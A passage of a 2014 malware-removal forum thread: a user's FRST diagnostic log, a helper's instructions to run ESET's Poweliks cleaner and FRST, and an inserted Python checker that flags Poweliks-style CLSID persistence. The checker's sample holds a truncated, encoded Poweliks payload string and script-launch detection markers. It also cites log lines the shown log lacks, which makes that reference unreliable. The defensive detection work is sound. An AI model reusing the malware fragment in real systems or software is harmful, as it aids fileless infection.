Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x505c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/01/2014 10:05:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0x57a8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/01/2014 06:02:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x000b18b2
Faulting process id: 0x55d0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/01/2014 05:48:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0x458c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
 
System errors:
=============
Error: (11/04/2014 00:32:27 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/04/2014 00:32:25 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (11/04/2014 00:31:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Multimedia Class Scheduler service failed to start due to the following error: 
%%1053
 
Error: (11/04/2014 00:31:55 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the MMCSS service.
 
Error: (11/04/2014 00:31:25 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (11/04/2014 00:30:53 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (11/04/2014 00:26:29 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/04/2014 00:25:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/04/2014 00:24:44 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
 
Error: (11/04/2014 00:23:48 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Data Broker for C:\Med\Meddata service depends on the Update Manager for C:\Med\Meddata service which failed to start because of the following error: 
%%1069
 
 
Microsoft Office Sessions:
=========================
Error: (06/18/2012 02:48:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 12315 seconds with 660 seconds of active time.  This session ended with a crash.
 
Error: (04/06/2012 04:46:02 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6612.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3383 seconds with 720 seconds of active time.  This session ended with a crash.
 
Error: (07/29/2011 10:05:40 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 1271 seconds with 420 seconds of active time.  This session ended with a crash.
 
Error: (03/09/2011 11:59:52 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 4397 seconds with 180 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2013-10-29 08:43:20.914
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2013-10-29 08:43:20.773
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2012-05-09 10:14:44.241
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2012-05-09 10:14:44.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-04-20 14:59:18.970
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-04-20 14:59:18.346
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:25:11.101
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:25:11.054
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:16:32.124
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:16:32.077
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU E7500 @ 2.93GHz
Percentage of memory in use: 65%
Total physical RAM: 2012.8 MB
Available physical RAM: 704.28 MB
Total Pagefile: 4025.61 MB
Available Pagefile: 1832.07 MB
Total Virtual: 2047.88 MB
Available Virtual: 1898.18 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:223.01 GB) (Free:142.75 GB) NTFS
Drive e: (Seagate Backup Plus Drive) (Fixed) (Total:931.51 GB) (Free:848.42 GB) NTFS
Drive f: (VMWARE) (Removable) (Total:1.91 GB) (Free:1.75 GB) FAT
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 232.8 GB) (Disk ID: EC0328C2)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=9.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=223 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 13BE7FB1)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (Size: 1.9 GB) (Disk ID: 88470719)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=06)
 
==================== End Of Log ============================

 

#2 deeprybka (Malware Response Team)

Posted 09 November 2014 - 12:49 PM

Hi & welcome to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully:
  • My native language isn't English, so please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand, kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all log files as a reply rather than as an attachment unless I specifically ask you. If you can not post all log files in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1

Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click the downloaded file to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Step 2

Please run a FRST scan. This will help us diagnose your problem.

Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them, as only the right one will run.)
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
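The "Poweliks?" marker in the FRST log above sits on a CustomCLSID whose LocalServer32 value launches rundll32.exe with a javascript: URL instead of an executable, and the same CLSID shows up in the System errors section as DCOM EventID 10010. The following Python checker is an added example (not code from the thread, from ESET or from FRST): it reads FRST Addition.txt lines, flags that LocalServer32 pattern and correlates it with the DCOM 10010 entries; the sample log is constructed from the lines quoted above plus one benign placeholder entry.

```python
"""Flag Poweliks-style CLSID persistence in FRST Addition.txt output.

Poweliks stores its payload in a CLSID's LocalServer32 value so that COM
activation runs ``rundll32.exe javascript:...`` rather than a COM server
executable.  Such a "server" never registers with the COM runtime, so the
same CLSID also surfaces as DCOM EventID 10010 in the System event log.
Added example; not part of the original thread or of the FRST tool.
"""
import re
from typing import Dict, List, Set

GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
CUSTOM_CLSID_RE = re.compile(r"^CustomCLSID: (?P<key>.+?) -> (?P<value>.*)$")
DCOM_10010_RE = re.compile(r"^Error: .*\(Source: DCOM\) \(EventID: 10010\)")

# Substrings that mark a LocalServer32 value as a script-host launch rather
# than a path to a COM server executable.
SCRIPT_MARKERS = ("javascript:", "vbscript:", "mshtml", "runhtmlapplication")


def server_type(key: str) -> str:
    """Return the last registry path component of a key, lower-cased."""
    return key.rsplit("\\", 1)[-1].lower()


def dcom_10010_clsids(lines: List[str]) -> Set[str]:
    """Collect CLSIDs reported by DCOM EventID 10010 (server did not register).

    FRST prints the CLSID on the 'Description:' line that follows the 'Error:' line.
    """
    found: Set[str] = set()
    for i, line in enumerate(lines):
        if DCOM_10010_RE.match(line) and i + 1 < len(lines):
            m = GUID_RE.search(lines[i + 1])
            if m:
                found.add(m.group(0).upper())
    return found


def analyze_frst_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per CustomCLSID whose LocalServer32 launches a script host."""
    lines = text.splitlines()
    dcom_hits = dcom_10010_clsids(lines)
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = CUSTOM_CLSID_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if server_type(key) != "localserver32":
            continue  # InprocServer32 entries point at DLLs; not the pattern checked here
        low = value.lower()
        if not (low.startswith("rundll32") and any(s in low for s in SCRIPT_MARKERS)):
            continue  # an ordinary path to a .exe is the expected, benign shape
        guid = GUID_RE.search(key)
        clsid = guid.group(0).upper() if guid else "<no CLSID parsed>"
        findings.append({
            "clsid": clsid,
            "key": key,
            "server_type": "localserver32",
            "reason": "LocalServer32 launches rundll32 with a script URL",
            "dcom_10010_seen": clsid in dcom_hits,  # corroborated by the event log?
        })
    return findings


# Constructed sample: the two CustomCLSID lines and the DCOM error pair are taken
# from the log posted above; the all-zero CLSID entry is a benign placeholder.
SAMPLE_LOG = r"""
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{3f04dadf-6ea4-44d1-a507-03cad176f443}\InprocServer32 -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000000}\LocalServer32 -> C:\Program Files\Example\example.exe (Example Corp)
Error: (11/04/2014 00:26:29 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
"""

if __name__ == "__main__":
    for finding in analyze_frst_log(SAMPLE_LOG):
        print(f"{finding['clsid']}: {finding['reason']}; "
              f"DCOM 10010 seen: {finding['dcom_10010_seen']}")
```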

#3 deeprybka (Malware Response Team)

Posted 12 November 2014 - 01:32 PM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#4 deeprybka (Malware Response Team)

Posted 14 November 2014 - 08:32 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 



